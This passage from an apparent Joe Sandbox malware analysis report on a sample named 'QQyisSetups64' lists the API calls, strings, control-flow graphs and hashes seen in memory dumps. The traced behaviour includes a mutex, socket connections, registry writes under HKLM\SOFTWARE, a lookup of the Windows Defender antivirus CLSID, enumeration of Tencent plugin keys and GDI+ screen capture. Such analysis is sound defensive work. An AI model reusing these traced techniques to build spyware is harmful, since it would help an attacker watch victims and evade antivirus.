                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                                                                      • String ID: 0u
                                                                                                                                                                                                                      • API String ID: 640718063-3203441087
                                                                                                                                                                                                                      • Opcode ID: 467c31de7e34738be6ae7ff76c90bf6276b199086856c1dcd4925853208b2d3f
                                                                                                                                                                                                                      • Instruction ID: 7ba63fb561188584cd85655fa1ccbe3a93ccccde89d17505fc65272fe0c0be14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 467c31de7e34738be6ae7ff76c90bf6276b199086856c1dcd4925853208b2d3f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A6175B1A40304AFE720EFA4DC45FAAB7B9FF48714F104619F646A72C0D7B0A904CB65

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 656 378ad10-378ad2b 657 378ad2d-378ad5b RegOpenKeyExW 656->657 658 378ad84-378ad8f 656->658 659 378ad79-378ad7e 657->659 660 378ad5d-378ad73 RegQueryValueExW 657->660 661 378b845-378b84b call 378ce00 658->661 662 378ad95-378ad9c 658->662 659->658 664 378b84e-378b854 659->664 660->659 661->664 665 378adea-378adf1 662->665 666 378afe3-378b09b call 378f707 call 3796770 call 378eff4 call 3797660 call 378f707 call 378cf20 call 378eff4 662->666 665->664 669 378adf7-378ae29 call 378f707 call 3796770 665->669 712 378b0a1-378b0ee call 3797660 RegCreateKeyW 666->712 713 378b162-378b189 call 378fa29 CloseHandle 666->713 678 378ae2b-378ae3f wsprintfW 669->678 679 378ae42-378ae4e 669->679 678->679 681 378ae9a-378aef1 call 378eff4 call 3797660 call 3782ba0 call 378efff * 2 679->681 682 378ae50 679->682 685 378ae54-378ae5f 682->685 688 378ae60-378ae66 685->688 692 378ae68-378ae6b 688->692 693 378ae86-378ae88 688->693 696 378ae6d-378ae75 692->696 697 378ae82-378ae84 692->697 698 378ae8b-378ae8d 693->698 696->693 701 378ae77-378ae80 696->701 697->698 702 378ae8f-378ae98 698->702 703 378aef4-378af09 698->703 701->688 701->697 702->681 702->685 706 378af10-378af16 703->706 709 378af18-378af1b 706->709 710 378af36-378af38 706->710 715 378af1d-378af25 709->715 716 378af32-378af34 709->716 711 378af3b-378af3d 710->711 717 378afae-378afe0 call 378fa29 CloseHandle call 378efff 711->717 718 378af3f-378af41 711->718 733 378b14a-378b15f RegCloseKey call 378fac9 712->733 734 378b0f0-378b13f call 378eff4 call 3785a30 RegDeleteValueW RegSetValueExW 712->734 715->710 722 378af27-378af30 715->722 716->711 724 378af43-378af4e call 378efff 718->724 725 378af55-378af5c 718->725 722->706 722->716 724->725 731 378af5e-378af69 call 378fac9 725->731 732 378af70-378af74 725->732 731->732 740 378af85-378afa9 call 378f020 732->740 741 378af76-378af7f call 378efff 732->741 733->713 734->733 752 378b141-378b147 call 378fac9 734->752 740->681 741->740 752->733
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0378AD53
                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0378AD73
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: OpenQueryValue
                                                                                                                                                                                                                      • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                                                                                                                      • API String ID: 4153817207-1338088003
                                                                                                                                                                                                                      • Opcode ID: c2b8e53b4c2ee1ac929c943e349e55b5919fe3605886ed41a34efb9c0f95e2f0
                                                                                                                                                                                                                      • Instruction ID: ff7d15ac16e8670d2b93d5e14b2eea563b8eb51b6ec93104f1a492e3f673ca9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2b8e53b4c2ee1ac929c943e349e55b5919fe3605886ed41a34efb9c0f95e2f0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28C1F6B5A803009BE714FF24DC45F6BB3A8FF94714F084929F945AB282E775E904C7A2

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03785F66
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03785F6E
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 03785F85
                                                                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03785F90
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03785F92
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03785FB9
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 03785FC6
                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,037A5328), ref: 03785FED
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 03785FF8
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 03786005
                                                                                                                                                                                                                      • GetConsoleWindow.KERNEL32 ref: 0378600F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                                                                                                                      • String ID: 2024.12. 3$key$open
                                                                                                                                                                                                                      • API String ID: 2922109467-4129338558
                                                                                                                                                                                                                      • Opcode ID: 353eff828b095c49459c8ff7c52dc910c54e2bf3a13c7a4bc2766a369d704df4
                                                                                                                                                                                                                      • Instruction ID: 12ea47d43df0230540d1de156b883196d9e368a5b36ad9f7a4b680f384a97cc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 353eff828b095c49459c8ff7c52dc910c54e2bf3a13c7a4bc2766a369d704df4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF210572A84709EBE610FB64EC45F5EB398ABC4614F144929E6049B1C1EBB4E508CBA3

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 814 37862b6-37862bd 815 37862c0-3786363 call 3796770 wsprintfW RegOpenKeyExW 814->815 818 37863e9-37863ff 815->818 819 3786369-3786376 call 3796770 815->819 822 3786402-3786404 818->822 821 378637b-37863ba RegQueryValueExW 819->821 823 37863dc-37863e3 RegCloseKey 821->823 824 37863bc-37863da lstrcatW * 2 821->824 822->815 825 378640a-3786418 822->825 823->818 824->823 826 378641a-378641f 825->826 827 3786422-378642f lstrlenW 825->827 826->827 828 3786441-3786450 827->828 829 3786431-378643b lstrcatW 827->829 830 378645a-378647a call 378f00a 828->830 831 3786452-3786457 828->831 829->828 831->830
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 037862CE
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 03786336
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0378635F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03786376
                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 037863B2
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(037B1F10,?), ref: 037863CE
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(037B1F10,037A535C), ref: 037863DA
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 037863E3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(037B1F10,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 03786427
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(037B1F10,037A53D4,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 0378643B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                                                                                                                      • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                                                                      • API String ID: 1671694837-1583895642
                                                                                                                                                                                                                      • Opcode ID: 18c0d90babd96d3d11cdaf23b0ab57d2794e900f555653dab8db8f37f9060185
                                                                                                                                                                                                                      • Instruction ID: 94fe0f348262831c1d55187217da09a7768e5eaafc46ec2d6c5aa4248162bf1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18c0d90babd96d3d11cdaf23b0ab57d2794e900f555653dab8db8f37f9060185
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0641A2F1A40628AEDB24DB54CC55FEEB7B8AB88704F0441C9F359A7182D6749B80CF64

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,75A373E0,?,?,?,03785611,0000035E,000002FA), ref: 0378749C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 037874B2
                                                                                                                                                                                                                      • swprintf.LIBCMT ref: 037874EF
                                                                                                                                                                                                                        • Part of subcall function 03787410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03787523), ref: 0378743D
                                                                                                                                                                                                                        • Part of subcall function 03787410: GetProcAddress.KERNEL32(00000000), ref: 03787444
                                                                                                                                                                                                                        • Part of subcall function 03787410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03787523), ref: 03787452
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03787547
                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03787563
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(000002FA), ref: 03787586
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,03785611,0000035E,000002FA), ref: 03787598
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                                                                                                                      • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 2158625971-3190923360
                                                                                                                                                                                                                      • Opcode ID: b48c4f1f3bd7d8e952990a4a5e91a8de784298b9624c13177f42a4027beafe3a
                                                                                                                                                                                                                      • Instruction ID: 797083a7a483f5b967e13abe2a45c8652dacf546ad1939ae34eb44b42474f360
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b48c4f1f3bd7d8e952990a4a5e91a8de784298b9624c13177f42a4027beafe3a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE31B6B5A41308BFD718EBA4DC45FAF7BBDDB88710F144519FA06A6146E674DB00C760

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,?,453DC9E3,?,00000000,?), ref: 0378C09E
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0378C0AA
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0378C0BF
                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0378C0D5
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(037AFB64), ref: 0378C113
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(037AFB64), ref: 0378C124
                                                                                                                                                                                                                        • Part of subcall function 03789DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03789E04
                                                                                                                                                                                                                        • Part of subcall function 03789DE0: GdipDisposeImage.GDIPLUS(?), ref: 03789E18
                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0378C14C
                                                                                                                                                                                                                        • Part of subcall function 0378A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0378A48D
                                                                                                                                                                                                                        • Part of subcall function 0378A460: _free.LIBCMT ref: 0378A503
                                                                                                                                                                                                                      • GetHGlobalFromStream.OLE32(?,?), ref: 0378C16D
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 0378C177
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0378C18F
                                                                                                                                                                                                                        • Part of subcall function 03789BA0: DeleteObject.GDI32(?), ref: 03789BD2
                                                                                                                                                                                                                        • Part of subcall function 03789BA0: EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BE3
                                                                                                                                                                                                                        • Part of subcall function 03789BA0: EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BF8
                                                                                                                                                                                                                        • Part of subcall function 03789BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03789B7B), ref: 03789C04
                                                                                                                                                                                                                        • Part of subcall function 03789BA0: LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C15
                                                                                                                                                                                                                        • Part of subcall function 03789BA0: LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C1C
                                                                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 0378C1A5
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 0378C221
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0378C249
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1483550337-0
                                                                                                                                                                                                                      • Opcode ID: 9ad6acdbed4ab88e26395905db071c0c243baff20fdb84a79b53f85aedb4761b
                                                                                                                                                                                                                      • Instruction ID: 6979c1979be12e7b0112630247563e77b57dd232c90f5b0262b0bb3dfd2f2640
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ad6acdbed4ab88e26395905db071c0c243baff20fdb84a79b53f85aedb4761b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86614CB5D00619EFDB14EFE9D88899EFBB8FF89710F10852AE915A7241DB349901CF60

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 037864C2
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 037864E2
                                                                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03786524
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03786560
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378658E
                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75A373E0), ref: 037865BA
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A373E0), ref: 037865C3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A373E0), ref: 037865D5
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75A373E0), ref: 03786625
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 03786635
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Tencent\Plugin\VAS, xrefs: 037864D8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                                                                                                                      • String ID: Software\Tencent\Plugin\VAS
                                                                                                                                                                                                                      • API String ID: 2921034913-3343197220
                                                                                                                                                                                                                      • Opcode ID: aaa759d307dbe3ccf7b7f3443c10933e6ce6afff2c16e428c13a18fc70d2f0de
                                                                                                                                                                                                                      • Instruction ID: 2456152c45e87d378a5958380753ffe5d1d479819484b0bf045321eeb25cef8f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa759d307dbe3ccf7b7f3443c10933e6ce6afff2c16e428c13a18fc70d2f0de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B41BCF5A40318BBDB24EB54DD85FEAB37DDB84700F0085D9E709B7181EA70AA858F64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0378A48D
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0378A4D1
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378A503
                                                                                                                                                                                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0378A522
                                                                                                                                                                                                                      • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0378A594
                                                                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 0378A59F
                                                                                                                                                                                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0378A5C5
                                                                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 0378A5DD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                                                                                                                      • String ID: &
                                                                                                                                                                                                                      • API String ID: 2794124522-3042966939
                                                                                                                                                                                                                      • Opcode ID: 5da9f209c01b93e4f737e5057b7b203c137a000ace2f99432ee3c096c262e23d
                                                                                                                                                                                                                      • Instruction ID: 4939b92775869881a5e19ab78c814d8f9007e00e1578a351f8511969797053c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5da9f209c01b93e4f737e5057b7b203c137a000ace2f99432ee3c096c262e23d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 285184B5E402199FDF44FFA4D848EEEB7B8EF48310F04851AE906AB250D734A945CBE1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C85382
                                                                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C85392
                                                                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C9C6E0,000012A0), ref: 02C853B0
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C853BB
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C8540F
                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C8541B
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C85434
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                                                                      • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                                                                      • API String ID: 864241144-2243437601
                                                                                                                                                                                                                      • Opcode ID: 751d9e1d5f7fd4643ae10ac2e0b6c422caca6ef648fb43e3a979a88608a2264b
                                                                                                                                                                                                                      • Instruction ID: ce25dc1a8cdb7c0a9bd5d85c111ba764f18c1de7cfc04622578f670b43789a83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 751d9e1d5f7fd4643ae10ac2e0b6c422caca6ef648fb43e3a979a88608a2264b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A64179716842409FD310AB349C0DF7B7BA5EB9538CFCE8548E18987182C3F0DA06C392
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C85382
                                                                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C85392
                                                                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C9C6E0,000012A0), ref: 02C853B0
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C853BB
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C8540F
                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C8541B
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C85434
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                                                                      • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                                                                      • API String ID: 864241144-2243437601
                                                                                                                                                                                                                      • Opcode ID: eb510a359f8a87cccbc43beb90612fab4aeb09eb87adde65495a7a731d51cbb7
                                                                                                                                                                                                                      • Instruction ID: 572573868bd2d7818bf057390305416838e086d4b1b8181611741247edc3e416
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb510a359f8a87cccbc43beb90612fab4aeb09eb87adde65495a7a731d51cbb7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8031D7706853819FD711EB30880DF7A7BA5AB8538CFDE9848E6899B142C3F0DA16C791
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,037A12F8,453DC9E3,00000001,00000000,00000000), ref: 0378CAB1
                                                                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(037A12F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0378CAE0
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378CB44
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378CB53
                                                                                                                                                                                                                      • RegEnumValueW.KERNEL32(037A12F8,?,00000000,?,00000000,?,00000000,?), ref: 0378CB72
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                        • Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F756
                                                                                                                                                                                                                        • Part of subcall function 0378F707: std::exception::exception.LIBCMT ref: 0378F770
                                                                                                                                                                                                                        • Part of subcall function 0378F707: __CxxThrowException@8.LIBCMT ref: 0378F781
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(037A12F8,?,?,?,?,?,?,?,?,?,?,?,00000000,037A12F8,000000FF), ref: 0378CC83
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                                                                                                                      • String ID: Console\0
                                                                                                                                                                                                                      • API String ID: 1348767993-1253790388
                                                                                                                                                                                                                      • Opcode ID: 7ff916adb2edd080c6ff0ad6dd16e81a10b5d8a9d98b64f7e23c674d7a423133
